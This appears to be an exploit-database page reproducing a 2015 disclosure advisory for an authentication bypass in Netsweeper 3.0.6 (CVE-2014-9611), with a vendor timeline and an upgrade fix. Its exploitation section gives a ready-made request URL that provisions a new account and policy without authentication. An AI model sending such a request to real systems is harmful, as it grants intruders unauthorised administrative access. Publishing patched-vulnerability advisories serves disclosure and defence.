Skip to content
cyberexploits
webappphptext

Netsweeper 3.0.6 - Authentication Bypass

Netsweeper 3.0.6 - Authentication Bypass

Published on 2015-08-21

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/37931.txt7eac4c3a
raw
+------------------------------------------------------------------------+

+ Netsweeper 3.0.6 - Authentication Bypass (Account and Policy Creation) +

+------------------------------------------------------------------------+

Affected Product: Netsweeper

Vendor Homepage	: www.netsweeper.com

Version 	: 3.0.6 (and probably other versions)

Discovered by	: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]

Patched      	: Yes

CVE		: CVE-2014-9611



+---------------------+

+ Product Description +

+---------------------+

Netsweeper is a software solution specialized in content filtering.



+----------------------+

+ Exploitation Details +

+----------------------+

An non-authenticated is able to provision new user accounts (and also create new policies under the same name as the newly created user accounts) 



URL Path: http:/netsweeper:8080/webadmin/nslam/index.php?username=secuid0&password=secuid0&ip=127.0.0.1&theme=Global%20Web%20Admin%20Theme&groupname=



+----------+

+ Solution +

+----------+

Upgrade to latest version.



+---------------------+

+ Disclosure Timeline +

+---------------------+

24-Nov-2014: Initial Communication

03-Dec-2014: Netsweeper responded

03-Dec-2014: Shared full details to replicate the issue

18-Dec-2014: Confirm fix on version 4.0.5

17-Jan-2015: CVE assigned CVE-2014-9611

11-Aug-2015: Public disclosure

View on GitHub